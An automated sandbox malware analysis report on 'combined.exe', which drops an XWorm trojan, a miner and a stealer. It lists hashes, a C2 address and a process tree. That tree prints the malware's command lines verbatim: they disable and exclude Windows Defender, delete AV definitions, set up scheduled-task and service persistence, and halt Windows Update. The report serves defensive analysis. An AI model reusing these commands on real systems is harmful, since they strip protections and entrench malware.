Analysis
-
max time kernel
23s -
max time network
50s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
22-05-2024 18:24
General
-
Target
combined.exe
-
Size
11.4MB
-
MD5
aaa99d2d8a50c6da60aeb620fb3aa340
-
SHA1
c734c86f06640c029b6a0521ac59981ac2ad3c9b
-
SHA256
759b9d9aa2deef42f8278715a6ed61a5e3e221681615332c2aa49c4ff8911e3d
-
SHA512
d2be54052366f209f2dd7f38177585e0c98497d4fec77e0d58722cae57a573f265621fcdc8afb56941d377c61e956acccd6a1368a8b4f9d2c253722d05c2e337
-
SSDEEP
196608:HojZ9Dxm6UDwH/IxTWxQBxv5gK8NmjeR+SHLsl+W5djQD4x0:Hork6UDwgYx8V53Rc+SHYlPdjL
Malware Config
Extracted
xworm
engine-romania.gl.at.ply.gg:37581
-
Install_directory
%AppData%
-
install_file
discord.exe
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
-
Detect Xworm Payload 2 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Creates new service(s) 2 TTPs
-
Stops running service(s) 4 TTPs
-
Drops startup file 2 IoCs
-
Executes dropped EXE 6 IoCs
-
Loads dropped DLL 17 IoCs
-
UPX packed file 46 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 8 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Modifies data under HKEY_USERS 41 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Users\Admin\AppData\Roaming\discord.exeC:\Users\Admin\AppData\Roaming\discord.exe2⤵
- Executes dropped EXE
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
- Drops file in System32 directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\combined.exe"C:\Users\Admin\AppData\Local\Temp\combined.exe"2⤵
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Built" /SC ONLOGON /TR "C:\Windows\System32\Built.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Built.exe"C:\Windows\System32\Built.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\Built.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All6⤵
- Deletes Windows Defender Definitions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('This Program Is Outdated Please Install The Latest Verison', 0, 'Error 403', 0+16);close()""5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('This Program Is Outdated Please Install The Latest Verison', 0, 'Error 403', 0+16);close()"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\miner.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "miner" /SC ONLOGON /TR "C:\Windows\System32\miner.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\miner.exe"C:\Windows\System32\miner.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "TYNMHYYA"4⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "TYNMHYYA" binpath= "C:\ProgramData\fcrxbbxtmpiq\amolcnprnsfi.exe" start= "auto"4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "TYNMHYYA"4⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Stealer.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "Stealer" /SC ONLOGON /TR "C:\Windows\System32\Stealer.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Stealer.exe"C:\Windows\System32\Stealer.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Stealer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stealer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\discord.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'discord.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "discord" /tr "C:\Users\Admin\AppData\Roaming\discord.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\ProgramData\fcrxbbxtmpiq\amolcnprnsfi.exeC:\ProgramData\fcrxbbxtmpiq\amolcnprnsfi.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
-
C:\Windows\system32\dialer.exedialer.exe2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
2PowerShell
1System Services
2Service Execution
2Scheduled Task/Job
1Persistence
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f4cebace363955b5fb79b606d1252b9e
SHA1f57eb08ca60074896c6d65c98e2f8b99450f7aee
SHA256ba0bf3227005c611f8d0d8ad6c73089c086e94019641f0fc14a303c760b6928a
SHA5125d63af7b9754546535b86504494ffc6eb0ad79653f148ce4a2e9199badbdf582fac30c31dfeecf79b9d67b21b779d5e4132da8884e1d365c1ca380c719f1a52f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD512113a8029d15ab9f14fcc4f59792f86
SHA14e6fe937b3d3781f337dd96b4c475435a89f4f5c
SHA256de0a0b6577b161f0af17f063c6683c8597bc77c103836883b6293de4c90a4a4b
SHA512aa0ea3bf4a4e0b8d19243d9047c099444c969f9696a6d34115aba1ad07592bd03dc59ac39c7a63985126eb518860307c7e0a5dbb95c3e8f4eafc25d02fccdc1f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD543654c683fa33eaf4c588793824953b4
SHA1f5e5270ab08dc5e7015a562081ca985015f0d707
SHA25655f5fda7cf54a41cfaa36b7c01f9865553fd4c805b5ed1d8da7621565378a1d7
SHA512a4acb8e0a4ee777f68d56ab7e136dceca6c99d695787894a10189d747f2cebcc6abab3694ebc882f538258648de5dd8c4e343a6637dceb0bfc86b5ef1803c2ad
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56acb1d6fd5ef1bce6480af866fbe5302
SHA1fe9cc7af0a6e307884b95a843e4960f3d376cd87
SHA25625b79c15b403f67f78741ab65bf9d54e2297343f5430efcb0ae7799509eaee85
SHA51270f921d1595d80e49a884b44585ca18632fa4a3231bcc7a1b6d24939f56dbf92c62a7e6729c445372019886ef045893f485d5435bbf514ab96a490fe81d23a07
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD51c3e4ee4044d8dddb3547592c4c8240d
SHA115d416d640a91f3699bb231da6aa2f8272916a11
SHA256ce330dda6afe41985f0ea9e93ea688dc0b2318bd5b8ab9170cc829f5cb935e62
SHA51222569331cf81e010b778c9b7334c1421e6960786a817c989c933c7754aa4c65f7289302b5c4ab0ea6de26a7da0595259cee0e5c309cb0aa0d1c388370e4d53a0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58a2c7a8c0cdd7ab70f6993438b1514ef
SHA1dd01e7fa6207043961863349d93c6989d0a13b00
SHA2561941176a49e058ceae391357003b2bf644f6b4ae805853c64fc35fb6d4d78efc
SHA512100f83dd6f1f00442cbc1ff48bfcc37f391d34627b1ada338a8bb3c450a8e442988412f13b176304afff096e7d77324c3151f10e05ff0f873b047c2a9c72abf4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b999b98da7ed5f1d2d3bb07f01880bcb
SHA1719f98bb36f36769b8515960adf0d054fad7922a
SHA256e46c9948ddfa712dc45efcc3e73fb5ddc187f60a55c295720f9cc8e385125eab
SHA512616e56c3df63c0269b4d1b6f2cae744c9c33327de4e82ef76b525bbb4ea410d7d510fee7d76a08f94c305c67ce3c7aa397a35c28deb587b61482b047e0c94dbd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e0bf3073a15c3d7db496673a191d7646
SHA140a057e55cd3aa89ebf17af0f712624960fd1e4a
SHA256f2ed359abc020e679f41909c25f04dac883d233b95adad71253cd1e1e5bc0388
SHA5125a53555a00a1f40ebdf40fc2229f00af68dbcadf3cf81af1a386b6693f0823eab598b393c23687ac61301e9c64195a17e4f54509b525e505757a0fbf00185101
-
C:\Users\Admin\AppData\Local\Temp\_MEI50522\VCRUNTIME140.dllFilesize
116KB
MD5be8dbe2dc77ebe7f88f910c61aec691a
SHA1a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA2564d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA5120da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655
-
C:\Users\Admin\AppData\Local\Temp\_MEI50522\_bz2.pydFilesize
48KB
MD53bd0dd2ed98fca486ec23c42a12978a8
SHA163df559f4f1a96eb84028dc06eaeb0ef43551acd
SHA2566beb733f2e27d25617d880559299fbebd6a9dac51d6a9d0ab14ae6df9877da07
SHA5129ffa7da0e57d98b8fd6b71bc5984118ea0b23bf11ea3f377dabb45b42f2c8757216bc38ddd05b50c0bc1c69c23754319cef9ffc662d4199f7c7e038a0fb18254
-
C:\Users\Admin\AppData\Local\Temp\_MEI50522\_decimal.pydFilesize
107KB
MD58b623d42698bf8a7602243b4be1f775d
SHA1f9116f4786b5687a03c75d960150726843e1bc25
SHA2567c2f0a65e38179170dc69e1958e7d21e552eca46fcf62bbb842b4f951a86156c
SHA512aa1b497629d7e57b960e4b0ab1ea3c28148e2d8ebd02905e89b365f508b945a49aacfbd032792101668a32f8666f8c4ef738de7562979b7cf89e0211614fa21a
-
C:\Users\Admin\AppData\Local\Temp\_MEI50522\_hashlib.pydFilesize
35KB
MD5d71df4f6e94bea5e57c267395ad2a172
SHA15c82bca6f2ce00c80e6fe885a651b404052ac7d0
SHA2568bc92b5a6c1e1c613027c8f639cd8f9f1218fc4f7d5526cfcb9c517a2e9e14c2
SHA512e794d9ae16f9a2b0c52e0f9c390d967ba3287523190d98279254126db907ba0e5e87e5525560273798cc9f32640c33c8d9f825ff473524d91b664fe91e125549
-
C:\Users\Admin\AppData\Local\Temp\_MEI50522\_lzma.pydFilesize
86KB
MD5932147ac29c593eb9e5244b67cf389bb
SHA13584ff40ab9aac1e557a6a6009d10f6835052cde
SHA256bde9bccb972d356b8de2dc49a4d21d1b2f9711bbc53c9b9f678b66f16ca4c5d3
SHA5126e36b8d8c6dc57a0871f0087757749c843ee12800a451185856a959160f860402aa16821c4ea659ea43be2c44fcdb4df5c0f889c21440aceb9ee1bc57373263c
-
C:\Users\Admin\AppData\Local\Temp\_MEI50522\_queue.pydFilesize
25KB
MD50e5997263833ce8ce8a6a0ec35982a37
SHA196372353f71aaa56b32030bb5f5dd5c29b854d50
SHA2560489700a866dddfa50d6ee289f7cca22c6dced9fa96541b45a04dc2ffb97122e
SHA512a00a667cc1bbd40befe747fbbc10f130dc5d03b777cbe244080498e75a952c17d80db86aa35f37b14640ed20ef21188ea99f3945553538e61797b575297c873f
-
C:\Users\Admin\AppData\Local\Temp\_MEI50522\_socket.pydFilesize
43KB
MD52957b2d82521ed0198851d12ed567746
SHA1ad5fd781490ee9b1ad2dd03e74f0779fb5f9afc2
SHA2561e97a62f4f768fa75bac47bba09928d79b74d84711b6488905f8429cd46f94a2
SHA512b557cf3fe6c0cc188c6acc0a43b44f82fcf3a6454f6ed7a066d75da21bb11e08cfa180699528c39b0075f4e79b0199bb05e57526e8617036411815ab9f406d35
-
C:\Users\Admin\AppData\Local\Temp\_MEI50522\_sqlite3.pydFilesize
56KB
MD5a9d2c3cf00431d2b8c8432e8fb1feefd
SHA11c3e2fe22e10e1e9c320c1e6f567850fd22c710c
SHA256aa0611c451b897d27dd16236ce723303199c6eacfc82314f342c7338b89009f3
SHA5121b5ada1dac2ab76f49de5c8e74542e190455551dfd1dfe45c9ccc3edb34276635613dbcfadd1e5f4383a0d851c6656a7840c327f64b50b234f8fdd469a02ef73
-
C:\Users\Admin\AppData\Local\Temp\_MEI50522\_ssl.pydFilesize
65KB
MD5e5f6bff7a8c2cd5cb89f40376dad6797
SHA1b854fd43b46a4e3390d5f9610004010e273d7f5f
SHA2560f8493de58e70f3520e21e05d78cfd6a7fcde70d277e1874183e2a8c1d3fb7d5
SHA5125b7e6421ad39a61dabd498bd0f7aa959a781bc82954dd1a74858edfea43be8e3afe3d0cacb272fa69dc897374e91ea7c0570161cda7cc57e878b288045ee98d9
-
C:\Users\Admin\AppData\Local\Temp\_MEI50522\base_library.zipFilesize
1.4MB
